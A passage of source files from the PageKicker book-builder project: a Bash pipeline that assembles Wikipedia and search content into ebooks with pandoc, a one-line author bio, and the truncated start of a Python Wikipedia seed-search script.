includes/mediawiki-fetch-loop.sh\n\n\n# adds search results to wiki4cloud\n\n# testing with dummy data\n\n#cp ~/lorem \"$TMPDIR$uuid/search_engine_results/cumulative.md\"\n\n# end test\n\nif [ \"$search_engine_on\" = \"yes\" ] ; then\n\techo \"adding search engine results to cover cloud\"\n\tcat \"$TMPDIR$uuid/search_engine_results/cumulative.md\" >> \"$TMPDIR\"$uuid/wiki/wiki4cloud.md\nelse\n\techo \"no search engine results to add to cover cloud\"\n\ttouch \"$TMPDIR\"$uuid/search_engine_results/cumulative.md\nfi\n\n# adds user-provided content\n\nif [ \"$add_this_content\" = \"none\" ] ; then\n\techo \"no added content\"\n\ttouch \"$TMPDIR\"$uuid/add_this_content.md\nelse\n\techo \"adding user content to cover cloud\"\n\tcp \"$add_this_content\" \"$TMPDIR\"$uuid\"/add_this_content_raw\"\n\techo \"$add_this_content\"\n\t\"$PANDOC_BIN\" -f docx -s -t markdown -o \"$TMPDIR\"$uuid\"/add_this_content.md\" \"$TMPDIR\"$uuid\"/add_this_content_raw\"\n\tcat \"$TMPDIR$uuid/add_this_content.md\" >> \"$TMPDIR$uuid/wiki/wiki4cloud.md\"\nfi\n\n# use googler to get search snippets\n\nif [ \"$googler_on\" = \"yes\" ] ; then\n\t. includes/googler.sh\nelse\n\techo \"not fetching Search Engine Snippets\"\n\ttouch \"$TMPDIR$uuid/googler.md\"\nfi\n\ncat \"$TMPDIR$uuid/googler.md\" >> \"$TMPDIR$uuid/wiki/wiki4cloud.md\"\n\nif [ \"$googler_news_on\" = \"yes\" ] ; then\n\t. includes/googler-news.sh\nelse\n\techo \"not fetching News Snippets\"\n\ttouch \"$TMPDIR$uuid/googler-news.md\"\nfi\n\ncat \"$TMPDIR$uuid/googler-news.md\" >> \"$TMPDIR$uuid/wiki/wiki4cloud.md\"\n\nif [ -n \"$content_collections\" ] ; then\n\techo \"content collections has value\"\n\t. includes/search-content-collections.sh\n\tcat \"$TMPDIR$uuid/content_collections/content_collections_results.md\" >> \"$TMPDIR$uuid/wiki/wiki4cloud.md\"\n\t\"$PYTHON_BIN\" bin/PKsum-clean.py -l \"$summary_length\" -o \"$TMPDIR$uuid/content_collections/summary.md\" \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\nelse\n\techo \"not searching content collections\"\n\ttouch \"$TMPDIR\"$uuid/content_collections/content_collections_results.md\n\ttouch \"$TMPDIR\"$uuid/content_collections/content_sources.md\nfi\n\necho \"summary is\" $summary # summary should be on for cover building\nwikilocale=\"en\" # hard-coded for testing\necho $wikilocale \"is wikilocale\"\n\nif [ -s \"$TMPDIR\"$uuid\"/wiki/wikisummaries.md\" ] ; then\n\techo \"summaries data has been returned, proceeding\"\n\twordcountsummaries=$(wc -w \"$TMPDIR\"$uuid\"/wiki/wikisummaries.md\" | cut -f1 -d' ')\n\nelif [ \"$wordcountpages\" -gt \"0\" ] ; then\n\techo \"pages data has been returned, proceeding\"\n\twordcount=$(wc -w \"$TMPDIR\"$uuid\"/wiki/wikipages.md\" | cut -f1 -d' ')\n\nelse\n\n\techo \"zero data returned from wiki, exiting with error message\"\n
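\t# sendemail flags, for reference: -t recipient, -u subject, -m message body,\n\t# -f from address, -xu/-xp SMTP username and password, -s SMTP host:port,\n\t# and -o tls=yes for STARTTLS on the Gmail relay configured here.\n\tsendemail -t \"$customer_email\" \\\n\t\t-u \"Your submission [ $booktitle ] has not been added to the catalog\" \\\n\t\t-m \"The system was not able to find any valid seed terms in your submission. Make sure that you have provided several keyphrases and that the words are spelled correctly. 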
Please let us know by replying to this message if you need assistance.\" \\\n\t\t-f \"$GMAIL_ID\" \\\n\t\t-cc \"$GMAIL_ID\" \\\n\t\t-xu \"$GMAIL_ID\" \\\n\t\t-xp \"$GMAIL_PASSWORD\" \\\n\t\t-s smtp.gmail.com:587 \\\n\t\t-v \\\n\t\t-o tls=yes\n\texit 73\nfi\n\n\t# build front matter page by page\n\n\techo \" \" >> \"$TMPDIR\"$uuid/titlepage.md\n\techo \" \" >> \"$TMPDIR\"$uuid/titlepage.md\n\techo \"# About $editedby\" >> \"$TMPDIR\"$uuid/titlepage.md\n\tcat \"$authorbio\" >> \"$TMPDIR\"$uuid/titlepage.md\n\techo \" \" >> \"$TMPDIR\"$uuid/titlepage.md\n\techo \" \" >> \"$TMPDIR\"$uuid/titlepage.md\n\n#acknowledgments\n\n. includes/acknowledgments.sh\n\n# describe the key settings used in book\n. includes/settings.sh\n\n# human-written abstracts\n\n. includes/abstracts.sh\n\n. includes/listofpages.sh\n\n. includes/topics_covered_runon.sh\n\n# changelog\n\n. includes/changelog.sh\n\n\t# run acronyms, programmatic summary, nerv3\n\t# against wiki4cloud content\n\ncat \"$TMPDIR$uuid/wiki/wiki4cloud.md\" >> \"$TMPDIR$uuid/tmpbody.md\"\n\n\"$PANDOC_BIN\" -o \"$TMPDIR\"$uuid/targetfile.txt -t plain -f markdown+smart \"$TMPDIR\"$uuid/tmpbody.md\n\n#split into chunks that can be handled in memory\n\nsplit -b 50000 \"$TMPDIR\"$uuid/targetfile.txt \"$TMPDIR\"$uuid\"/xtarget.\"\n\n. includes/transect_summarize_ner.sh\n\n# clean up both unprocessed and postprocessed summary text\n\n cp \"$TMPDIR$uuid/pp_summary.txt\" \"$TMPDIR$uuid/clean_summary.txt\"\n\n\tsed -i G \"$TMPDIR\"$uuid/pp_summary.txt\n\n\tsed -i G \"$TMPDIR\"$uuid/summary.txt\n echo\n\tsed -n 3p \"$TMPDIR\"$uuid/pp_summary.txt > \"$TMPDIR\"$uuid/pp_summary_all.txt # for tldr\n\techo '\\pagenumbering{gobble}' > \"$TMPDIR\"$uuid/pp_summary_sky.txt\n\n\techo \" \" >> \"$TMPDIR\"$uuid/pp_summary_sky.txt\n sed -n 1,35p \"$TMPDIR\"$uuid/pp_summary.txt >> \"$TMPDIR\"$uuid/pp_summary_sky.txt # for skyscraper\n cp \"$TMPDIR\"$uuid/pp_summary_sky.txt $TMPDIR$uuid/pp_summary_sky.md\n\n\t# throw away unpreprocessed summary text if zero size\n\n\tif [ `wc -c < \"$TMPDIR\"$uuid/pp_summary.txt` = \"0\" ] ; then\n\t echo using \"unpostprocessed summary bc wc pp summary = 0\"\n\t cat \"$TMPDIR$uuid\"/summary.txt >> $TMPDIR$uuid/programmaticsummary.md\n\telse\n\t cp \"$TMPDIR\"$uuid/pp_summary.txt \"$TMPDIR\"$uuid/summary.md\n\t\tcat \"$TMPDIR$uuid\"/summary.md >> $TMPDIR$uuid/programmaticsummary.md\n\tfi\n\n#tldr\n\n. 
includes/tldr_auto.sh #returns tldr.txt and tldr.md\n\n# assemble body\n\n## user provided content\n\n\n## encyclopedia content\n\nif [ \"$summary\" = \"summaries_only\" ] ; then\n\techo \"no body\"\n\ttouch $TMPDIR$uuid/chapters.md\nelse\n\techo \" \" >> $TMPDIR$uuid/chapters.md\n\techo \" \" >> \"$TMPDIR\"$uuid/chapters.md\n\techo \"# Encyclopedia Content\" >> \"$TMPDIR\"$uuid/chapters.md\n\tcat \"$TMPDIR\"$uuid\"/wiki/wiki4chapters.md\" | sed -e 's/#/##/' >> \"$TMPDIR\"$uuid/chapters.md\n\techo \" \" >> \"$TMPDIR\"$uuid/chapters.md\n\techo \" \" >> \"$TMPDIR\"$uuid/chapters.md\nfi\n\n# assemble section for search engine content\n\n#echo \" \" >> $TMPDIR$uuid/search_engine_content.md\n#echo \" \" >> \"$TMPDIR\"$uuid/search_engine_content.md\n#echo \"# Search Engine Content\" >> \"$TMPDIR\"$uuid/search_engine_content.md\n#cat \"$TMPDIR\"$uuid\"/search_engine_results/cumulative.md\" >> \"$TMPDIR\"$uuid/search_engine_content.md\n#echo \" \" >> \"$TMPDIR\"$uuid/search_engine_content.md\n#echo \" \" >> \"$TMPDIR\"$uuid/search_engine_content.md\n\n# acronyms\n\necho \"# Acronyms\" > $TMPDIR$uuid/tmpacronyms.md\necho \" \" >> $TMPDIR$uuid/tmpacronyms.md\necho \" \" >> $TMPDIR$uuid/tmpacronyms.md\n$scriptpath/bin/acronym-filter.sh --txtinfile \"$TMPDIR\"$uuid/targetfile.txt > \"$TMPDIR\"$uuid/acronyms.txt\nsed G $TMPDIR$uuid/acronyms.txt | sed 's/^#/[hashtag]/g' >> $TMPDIR$uuid/acronyms.md\ncat $TMPDIR$uuid/acronyms.md >> $TMPDIR$uuid/tmpacronyms.md\ncp $TMPDIR$uuid/tmpacronyms.md $TMPDIR$uuid/acronyms.md\n\n# Unique nouns\ncat \"$TMPDIR\"$uuid/Places \"$TMPDIR\"$uuid/People \"$TMPDIR\"$uuid/Other > \"$TMPDIR\"$uuid/all_nouns.txt\n#ls \"$TMPDIR\"$uuid/xtarget.*nouns* > \"$TMPDIR\"$uuid/testnouns\n# cat \"$TMPDIR\"$uuid/xtarget.*nouns* > \"$TMPDIR\"$uuid/all_nouns.txt\nsort --ignore-case \"$TMPDIR\"$uuid/all_nouns.txt | sed 's/^#/[hashtag]/g' | uniq > \"$TMPDIR\"$uuid/sorted_uniqs.txt\nsed '1s/^/# Unique Proper Nouns and Key terms\\n/' \"$TMPDIR\"$uuid/sorted_uniqs.txt > $TMPDIR$uuid/tmpuniqs.txt\ncp \"$TMPDIR\"$uuid/tmpuniqs.txt \"$TMPDIR\"$uuid/sorted_uniqs.txt\nsed -i G \"$TMPDIR\"$uuid/sorted_uniqs.txt\necho '\\pagenumbering{gobble}' > $TMPDIR$uuid/sorted_uniqs_sky.txt\necho \" \" >> $TMPDIR$uuid/sorted_uniqs_sky.txt\nsed -n 1,25p $TMPDIR$uuid/sorted_uniqs.txt >> $TMPDIR$uuid/sorted_uniqs_sky.txt\ncp \"$TMPDIR\"$uuid/sorted_uniqs.txt \"$TMPDIR\"$uuid/sorted_uniqs.md\ncp \"$TMPDIR\"$uuid/sorted_uniqs_sky.txt \"$TMPDIR\"$uuid/sorted_uniqs_sky.md\n\necho \"\" >> \"$TMPDIR\"$uuid/sorted_uniqs.md\necho \"\" >> \"$TMPDIR\"$uuid/sorted_uniqs.md\n\nif [ \"$sample_tweets\" = \"yes\" ] ; then\n\t\t\techo \"adding Tweets to back matter\"\n\t\t\tcat \"$TMPDIR\"$uuid/twitter/sample_tweets.md >> \"$TMPDIR\"$uuid/backmatter.md\nelse\n\t\t\techo \"no sample tweets\"\n\t\t\ttouch $TMPDIR$uuid/twitter/sample_tweets.md\nfi\n\n\tif [ \"$flickr\" = \"on\" ] ; then\n\n\t\tcd \"$TMPDIR\"$uuid/flickr\n\t\tfor file in *.md\n\t\tdo\n\t\t cat $file >> allflickr.md\n\t\t echo '\\newpage' >> allflickr.md\n\t\t echo \"\" >> allflickr.md\n\t\tdone\n\t\tcat allflickr.md >> \"$TMPDIR\"$uuid/backmatter.md\n\t\t#cp *.jpg ..\n\t\t# cp allflickr.md ..\n\t\t#cd ..\n\t\t# $PANDOC -o images.pdf allflickr.md\n\t\t# cd $scriptpath\n\t\t# echo \"converted flickr md files to pdf pages with images\" | tee --append $xform_log\n\n\telse\n\t\techo \"didn't process flickr files\"\n\t\ttouch $TMPDIR$uuid/allflickr.md\n\tfi\n\n# Build sources page\n\n\techo \"# Sources\" >> \"$TMPDIR$uuid/sources.md\"\n echo \" \" >> 
\"$TMPDIR$uuid/sources.md\"\n\twhile IFS= read -r line; do\n\n\tsafeline=$(echo $line | sed -e 's/[ ]/_/g')\n\techo \"Wikipedia contributors, $line, Wikipedia, The Free Encyclopedia, https://en.wikipedia.org/w/index.php?title=$safeline, accessed $(date +\"%m-%d-%Y\").\" >> \"$TMPDIR$uuid/wiki/wikisources.md\"\n echo \" \" >> \"$TMPDIR\"$uuid/wiki/wikisources.md\n\techo \" \" >> \"$TMPDIR\"$uuid/wiki/wikisources.md\n\tdone < \"$TMPDIR$uuid/seeds/filtered.pagehits\"\n\n# add search engine results to sources section\n\nwhile IFS= read -r line; do\n\tsafeline=$(echo $line | sed -e 's/[ ]/_/g')\n\techo \"$search_plugin_name\", $line, Wikipedia, The Free Encyclopedia, https://en.wikipedia.org/w/index.php?title=$safeline, accessed $(date +\"%m-%d-%Y\"). >> \"$TMPDIR$uuid/wiki/wikisources.md\"\n\techo \" \" >> \"$TMPDIR\"$uuid/wiki/wikisources.md\n\techo \" \" >> \"$TMPDIR\"$uuid/wiki/wikisources.md\ndone < \"$TMPDIR$uuid/seeds/filtered.pagehits\"\n\n# pipe other sources in here, either apppend with ## second-level heading or sort -u\n\n cat \"$TMPDIR\"$uuid/content_collections/content_sources.md >> \"$TMPDIR\"$uuid/sources.md\n cat \"$TMPDIR\"$uuid/wiki/wikisources.md >> \"$TMPDIR\"$uuid/sources.md\n\n \tcat includes/wikilicense.md >> \"$TMPDIR/$uuid/sources.md\"\n\techo \"\" >> \"$TMPDIR$uuid/sources.md\"\n\techo \"\" >> \"$TMPDIR$uuid/sources.md\"\n\n\techo \"# Also built by \"$imprintname\" Robot $jobprofilename\" >> \"$TMPDIR\"$uuid/builtby.md\n\tsort -u --ignore-case \"$LOCAL_DATA\"bibliography/robots/\"$jobprofilename\"/$jobprofilename\"_titles.txt\" -o \"$LOCAL_DATA\"/bibliography/robots/\"$jobprofilename\"/$jobprofilename\"_titles.tmp\" # currently sort by alphabetical\n\tcat \"$LOCAL_DATA\"/bibliography/robots/\"$jobprofilename\"/\"$jobprofilename\"\"_titles.tmp\" >> \"$TMPDIR\"$uuid/builtby.md\n\techo \" \">> \"$TMPDIR\"$uuid/builtby.md\n\techo \" \" >> \"$TMPDIR\"$uuid/builtby.md\n\necho \"starting imprint biblio\"\n\n\tif [ \"add_imprint_biblio\" = \"yes\" ] ; then\n\t\t\techo \"# Also from $imprintname\" >> \"$TMPDIR\"$uuid/byimprint.md\n\t\t\tuniq \"$LOCAL_DATA\"bibliography/imprints/\"$imprint\"/$imprint\"_titles.txt\" >> \"$TMPDIR\"$uuid/byimprint.md # imprint pubs are not alpha\n\t\t\techo \"\" >> \"$TMPDIR\"$uuid\"/byimprint.md\"\n\t\t\techo \"\" >> \"$TMPDIR\"$uuid\"/byimprint.md\"\n\telse\n\t\t \ttrue\n\t\t\ttouch $TMPDIR$uuid/byimprint.md\n\t\t\t# commenting out imprint bibliography because data is too messy right now\n fi\n\n# builds analyzed webpage info for back matter\"\n\necho \"$analyze_url is analyze_url\"\ntouch \"$TMPDIR\"$uuid\"/analyzed_webpage.md\"\n\n# if [ -z ${analyze_url+x} ] ; then\n#\n# \t\t\t echo \"no web page was analyzed\"\n# else\n# \t\t\techo \"\" >> \"$TMPDIR\"$uuid\"/analyzed_webpage.md\"\n# \t\t\techo \"\" >> \"$TMPDIR\"$uuid/\"analyzed_webpage.md\"\n# \t\t\t\"$PANDOC_BIN\" -s -r html \"$analyze_url\" -o \"$TMPDIR\"$uuid\"/analyzed_webpage.md\"\n# \t\t\t#\"$PYTHON_BIN\" bin/nerv3.py \"$TMPDIR\"$uuid\"/analyzed_webpage.md\" \"$TMPDIR\"$uuid\"/analyzed_webseeds\" \"$uuid\"\n# \t\t\tcd \"$NER_BIN\" && java -mx600m -cp \"*:lib/*\" edu.stanford.nlp.ie.crf.CRFClassifier -loadClassifier classifiers/english.all.3class.distsim.crf.ser.gz -textFile \"$TMPDIR\"$uuid\"/webpage.md\" -outputFormat tabbedEntities > \"$TMPDIR\"$uuid\"/webseeds\"\n# \t\t\tcd \"\"$scriptpath\"\n# \t\t\techo \"# Webpage Analysis\" >> \"$TMPDIR\"$uuid/analyzed_webpage.md\n# \t\t\techo \"I analyzed this webpage $analyze_url. 
I found the following keywords on the page.\" >> \"$TMPDIR\"$uuid/analyzed_webpage.md\"\n# \t\t\tcomm -2 -3 <(sort \"$TMPDIR\"$uuid\"/analyzed_webseeds\") <(sort $scriptpath\"locale/stopwords/webstopwords.\"$wikilang) >> \"$TMPDIR\"$uuid\"/analyzed_webpage.md\n# \t\t\techo \"\" >> \"$TMPDIR\"$uuid\"/analyzed_webpage.md\"\n# \t\t\techo \"\" >> \"$TMPDIR\"$uuid\"/analyzed_webpage.md\"\n# fi\n\ntouch \"$TMPDIR\"$uuid/imprint_mission_statement.md\necho \"imprint is $imprint\"\ncat $confdir\"jobprofiles/imprints/$imprint/\"\"$imprint_mission_statement\" >> \"$TMPDIR\"$uuid\"/imprint_mission_statement.md\"\necho '!['\"$imprintname\"']'\"(\"\"$imprintlogo\"\")\" >> \"$TMPDIR\"$uuid/imprint_mission_statement.md\necho \"built back matter\"\n\nmy_year=`date +'%Y'`\n\necho \"\" > \"$TMPDIR\"$uuid/yaml-metadata.md\necho \"---\" >> \"$TMPDIR\"$uuid/yaml-metadata.md\necho \"title: \\\"$booktitle\\\"\" >> \"$TMPDIR\"$uuid/yaml-metadata.md\necho \"subtitle: \\\"$subtitle\\\"\" >> \"$TMPDIR\"$uuid/yaml-metadata.md\necho \"creator: \" >> \"$TMPDIR\"$uuid/yaml-metadata.md\necho \"- role: author \" >> \"$TMPDIR\"$uuid/yaml-metadata.md\necho \" text: \"\" \\\"$editedby\\\"\" >> \"$TMPDIR\"$uuid/yaml-metadata.md\necho \"publisher: \\\"$imprintname\\\"\" >> \"$TMPDIR\"$uuid/yaml-metadata.md\necho \"rights: (c) \\\"$my_year $imprintname\\\"\" >> \"$TMPDIR\"$uuid/yaml-metadata.md\necho \"---\" >> \"$TMPDIR\"$uuid/yaml-metadata.md\n\nsafe_product_name=$(echo \"$booktitle\" | sed -e 's/[^A-Za-z0-9._-]/_/g')\nbibliography_title=$(echo \"$booktitle\" | sed -e 's/[^A-Za-z0-9 :;,.?]//g')\n\n#always builds all partsofthebook\necho \"starting parts of the book assembler\"\n. includes/partsofthebook.sh\n\n# always builds cover\necho \"starting cover builder\"\n. includes/builder-cover.sh\n\n# sometimes build additional booktypes\n\ncase $booktype in\nreader)\n\t# default\n echo \"assembled all parts of the book by default\"\n ;;\ndraft-report)\n\techo \"assembling parts needed for $booktype\"\n . includes/draft-report.sh\n\t\"$PANDOC_BIN\" -o \"$TMPDIR$uuid/draft-report-$safe_product_name.docx\" \"$TMPDIR\"$uuid/draft-report.md\n\t\"$PANDOC_BIN\" -t mediawiki -o \"$TMPDIR$uuid/draft-report-$safe_product_name.mw\" \"$TMPDIR\"$uuid/draft-report.md\n\tcp \"$TMPDIR$uuid/draft-report.md\" \"$TMPDIR$uuid/complete.md\"\n\t# note that draft-report does not get SKU because it is not a completed product\n ;;\ncontent-collections-first)\n\t\techo \"assembling parts needed for $booktype\"\n\t . includes/content-collections-first.sh\n\t\t\"$PANDOC_BIN\" -o \"$TMPDIR$uuid/ccf-$safe_product_name.docx\" \"$TMPDIR\"$uuid/content-collections-first.md\n\t\t# note that content-collections-first does not get SKU because it is not a completed product\n\t ;;\ndaily-email)\n\t\t\t\techo \"assembling parts needed for $booktype\"\n\t\t\t . 
includes/daily-email.sh\n\t\t\t;;\n*)\n\techo \"assembled all parts of the book by default\"\n\t;;\nesac\n\n# build ebook deliverables (epub, docx, txt, mediawiki)\n\ncd \"$TMPDIR\"$uuid\n\"$PANDOC_BIN\" -o \"$TMPDIR\"$uuid/$sku\".\"$safe_product_name\".epub\" --epub-cover-image=\"$TMPDIR\"$uuid/cover/$sku\"ebookcover.jpg\" \"$TMPDIR\"$uuid/complete.md\n\"$PANDOC_BIN\" -o \"$TMPDIR\"$uuid/$sku\".\"$safe_product_name\".docx\" \"$TMPDIR\"$uuid/complete.md\n\"$PANDOC_BIN\" -o \"$TMPDIR\"$uuid/$sku\".\"$safe_product_name\".txt\" \"$TMPDIR\"$uuid/complete.md\n\"$PANDOC_BIN\" -o \"$TMPDIR\"$uuid/$sku\".\"$safe_product_name\".mw\" -t mediawiki -s \"$TMPDIR\"$uuid/complete.md\ncp \"$TMPDIR\"$uuid/$sku\".\"$safe_product_name\".txt\" \"$TMPDIR\"$uuid/4stdout\".txt\"\n\ncd \"$scriptpath\"\n\nif [ \"$kindlegen_on\" = \"yes\" ] ; then\n\tlib/KindleGen/kindlegen \"$TMPDIR\"$uuid/$sku.\"$safe_product_name\"\".epub\" -o \"$sku.$safe_product_name\"\".mobi\"\nelse\n\tebook-convert \"$TMPDIR\"$uuid/$sku.\"$safe_product_name\"\".epub\" \"$TMPDIR\"$uuid\"/$sku.$safe_product_name\"\".mobi\"\nfi\n\necho \"built epub, mobi, docx, txt, and mediawiki\"\ncase $ebook_format in\n\nepub)\nif [ ! \"$buildtarget\" ] ; then\n\tbuildtarget=\"$TMPDIR\"$uuid\"/buildtarget.epub\"\nelse\n\techo \"received buildtarget as $buildtarget\"\nfi\n# deliver epub to build target\ncp \"$TMPDIR\"$uuid/$sku.$safe_product_name\".epub\" \"$buildtarget\"\nchmod 755 \"$buildtarget\"\n#echo \"checking that buildtarget exists\"\n#ls -la $buildtarget\n;;\n\nmobi)\nif [ ! \"$buildtarget\" ] ; then\n\tbuildtarget=\"$TMPDIR\"$uuid\"/buildtarget.mobi\"\nelse\n\techo \"received buildtarget as $buildtarget\"\nfi\ncp \"$TMPDIR\"$uuid/$sku.$safe_product_name\".mobi\" \"$buildtarget\"\n#echo \"checking that buildtarget exists\"\n#ls -la $buildtarget\n;;\ndocx)\nif [ ! \"$buildtarget\" ] ; then\n\tbuildtarget=\"$TMPDIR\"$uuid\"/buildtarget.docx\"\nelse\n\techo \"received buildtarget as $buildtarget\"\nfi\ncp \"$TMPDIR\"$uuid/$sku\".\"$safe_product_name\".docx\" \"$buildtarget\"\nchmod 755 \"$buildtarget\"\n#echo \"checking that buildtarget exists\"\n#ls -la $buildtarget\n;;\n*)\n\nesac\n
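\n# The three delivery branches above repeat the same copy-and-chmod steps; a\n# helper along these lines would collapse them. A sketch only -- nothing calls\n# it yet, and the name is illustrative:\ndeliver_build() {\n\t# $1 = built file, $2 = delivery target handed in by the caller\n\tcp \"$1\" \"$2\" && chmod 755 \"$2\"\n}\n\n# build skyscraper image\n\nif [ -z \"$skyscraper\" ]; then\n\techo \"no skyscraper\"\nelse\n\n\t. 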
includes/1000x3000skyscraper.sh\n\techo \"built skyscraper\"\nfi\n\n# housekeeping\n\nunique_seed_string=$(sed -e 's/[^A-Za-z0-9._-]//g' < \"$TMPDIR\"$uuid/seeds/sorted.seedfile | tr -d '\\n')\n\n#checking if seedstring already in imprint corpus\n\nif [ \"$add_corpora\" = \"yes\" ] ; then\n\n\tif grep -q \"$unique_seed_string\" \"$SFB_HOME\"shared-corpus/imprints/\"$imprint\"/unique_seed_strings.sorted ; then\n\t\techo \"seed string $unique_seed_string is already in corpus for imprint $imprint\"\n\telse\n\t\tcp -u \"$TMPDIR\"$uuid\"/\"$sku.$safe_product_name\".epub\" \"$SFB_HOME\"shared-corpus/imprints\"/\"$imprint\"/\"$sku.$safe_product_name\".epub\"\n\t\techo \"added book associated with $unique_seed_string to corpus for imprint $imprint\"\n\tfi\nelse\n\t:\nfi\n\n# checking if seed string is already in robot corpus\nif [ \"$add_corpora\" = \"yes\" ] ; then\n\n\tif grep -q \"$unique_seed_string\" \"$SFB_HOME\"shared-corpus/robots/$jobprofilename/unique_seed_strings.sorted ; then\n\t\techo \"seed string $unique_seed_string is already in corpus for robot $jobprofilename \"\n\telse\n\t\tcp \"$TMPDIR\"$uuid\"/\"$sku.$safe_product_name\".epub\" \"$SFB_HOME\"shared-corpus/robots/\"$jobprofilename\"/\"$sku.$safe_product_name.epub\"\n\t\techo \"added book associated with $unique_seed_string to corpus for robot $jobprofilename\"\n\tfi\nelse\n\ttrue\nfi\n\nif [ \"$add_corpora\" = \"yes\" ] ; then\n\techo \"$unique_seed_string\" >> \"$SFB_HOME\"shared-corpus/imprints/\"$imprint\"/unique_seed_strings\n\techo \"$unique_seed_string\" >> \"$SFB_HOME\"shared-corpus/robots/\"$jobprofilename\"/unique_seed_strings\n\tsort -u $SFB_HOME\"shared-corpus/robots/\"$jobprofilename\"/unique_seed_strings\" > $SFB_HOME\"shared-corpus/robots/\"$jobprofilename\"/unique_seed_strings.sorted\"\n\tsort -u $SFB_HOME\"shared-corpus/imprints/\"$imprint\"/unique_seed_strings\" > $SFB_HOME\"shared-corpus/imprints/\"$imprint\"/unique_seed_strings.sorted\"\n\nelse\n\techo \"not requested to add builds and unique_seed_strings to corpus\"\nfi\n\n\nif [ -z \"$batch_uuid\" ] ; then\n\techo \"not part of a batch\"\nelse\n\tcp \"$TMPDIR\"$uuid/$sku.$safe_product_name\".epub\" \"$TMPDIR\"$batch_uuid/$sku.$safe_product_name\".epub\"\n cp \"$TMPDIR\"$uuid/$sku.$safe_product_name\".mobi\" \"$TMPDIR\"$batch_uuid/$sku.$safe_product_name\".mobi\"\n cp \"$TMPDIR\"$uuid/$sku.$safe_product_name\".docx\" \"$TMPDIR\"$batch_uuid/$sku.$safe_product_name\".docx\"\n cp \"$TMPDIR\"$uuid/summary.txt \"$TMPDIR\"$batch_uuid/$sku.$safe_product_name\"_summary\"\n cp \"$TMPDIR\"$uuid/all_nouns.txt \"$TMPDIR\"$batch_uuid/$sku.$safe_product_name\"_all_nouns\"\n cp \"$TMPDIR\"$uuid/acronyms.txt \"$TMPDIR\"$batch_uuid/$sku.$safe_product_name\"_acronyms\"\n cp \"$TMPDIR\"$uuid/cover/wordcloudcover.png \"$TMPDIR\"$batch_uuid/$sku.$safe_product_name\"_wordcloudcover.png\"\n cp \"$TMPDIR\"$uuid/seeds/filtered.pagehits \"$TMPDIR\"$batch_uuid/$sku.$safe_product_name\"_filtered.pagehits\"\n #ls -l \"$TMPDIR\"\"$batch_uuid\"/* # debug\nfi\necho \"seedfile is $seedfile\"\n\nif [ \"$dontcleanupseeds\" = \"yes\" ]; then\n\techo \"leaving seed file in place $seedfile\"\n\t# default is \"yes\" in includes/set-variables\nelse\n echo \"cleaning up seed file [deprecated, for use with Magento script tool]\"\n\trm \"$seedfile\"\nfi\n\n# increment sku\n\nsku=$((sku+1))\necho $sku >> \"$LOCAL_DATA\"\"SKUs/sku_list\"\necho \"incremented SKU by 1 to\" $sku \" and updated SKUs/sku_list\"\n\necho \"moving tmp biography to replace prior one\"\ncp 
\"$LOCAL_DATA\"bibliography/robots/\"$jobprofilename\"/\"$jobprofilename\"\"_titles.tmp\" \"$LOCAL_DATA\"/bibliography/robots/\"$jobprofilename\"/\"$jobprofilename\"\"_titles.txt\"\necho \"appending & sorting new bibliography entries\" # last item is out of alpha order, so must be sorted when read in future\necho \"adding markdown-safe bibliography title as $bibliography_title\"\necho \"* $bibliography_title\" >> \"$LOCAL_DATA\"bibliography/robots/\"$jobprofilename\"/\"$jobprofilename\"_titles.txt\necho \"* $bibliography_title\" >> \"$LOCAL_DATA\"bibliography/imprints/\"$imprint\"/\"$imprint\"_titles.txt\ncat \"$TMPDIR\"$uuid\"/yaml-metadata.md\" >> \"$LOCAL_DATA\"bibliography/yaml/allbuilds.yaml\n\n# add some simple tests that builds worked ok\n\n# always reports success, whether verbose is on or off\n\nexec 1>&3\necho \"builder run complete, files in $TMPDIR$uuid/\"\n\nexit 0\n" }, { "alpha_fraction": 0.7472527623176575, "alphanum_fraction": 0.7802197933197021, "avg_line_length": 89, "blob_id": "ee3c660efd8af875b4ef044ecd608ded20b46a18", "content_id": "4620be51e6fbef8dba8b5f095f8c597134e5b86f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 91, "license_type": "permissive", "max_line_length": 89, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/Gigo.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Gigo was created to test the create a robot feature for SI 622. Hopefully this will work. \n" }, { "alpha_fraction": 0.6836591958999634, "alphanum_fraction": 0.6913408041000366, "avg_line_length": 27.078432083129883, "blob_id": "93cc7432b8dba7383c70900013dd032df58fdd72", "content_id": "c02a306b432d90fe2c42b92420316edd2b4acf00", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1432, "license_type": "permissive", "max_line_length": 113, "num_lines": 51, "path": "/scripts/bin/mwseeds.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- codinwig: utf-8 -*-\n\"\"\"\nFred Zimmerman\[email protected]\n(c) PageKicker 2014\n\n\"\"\"\n\nimport argparse\nimport codecs\nimport sys\nimport time\nimport wikipedia\nimport mwclient\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--infile\", help = \"seed file\", default = 'test')\nparser.add_argument(\"--lang\", help=\"wiki language bigram\", default = 'en')\nparser.add_argument(\"--request_type\", help=\"request type\", default = 'sum')\nparser.add_argument(\"--outfile\", help = \"path to outfile\", default = 'outfile')\nparser.add_argument(\"--summary\", help = \"true or false\", action = \"store_true\")\nparser.add_argument(\"--pagehits\", help = \"path to list of page hits\", default = 'pagehits')\nparser.add_argument(\"--mediawiki_api_url\", help = \"true or false\", default = 'http://en.wikipedia.org/w/api.php')\nargs = parser.parse_args()\n\ninput_file = args.infile\noutput_file = args.outfile\npagehits = args.pagehits\nlang = args.lang\nsummary = args.summary\nrequest_type = args.request_type\nmediawiki_api_url = args.mediawiki_api_url\nwikipedia.set_lang(lang)\n\ntest = 'mw url is ' + mediawiki_api_url\nprint(test)\n\nfile1 = open(input_file, 'r')\nfile3 = codecs.open(pagehits,'w','utf-8')\nfor line in file1:\n print(line)\n try:\n seedhits = wikipedia.search(line)\n\n except:\n wikipedia.exceptions.DisambiguationError\n wikipedia.exceptions.WikipediaException\n continue\n\n for i in seedhits:\n 
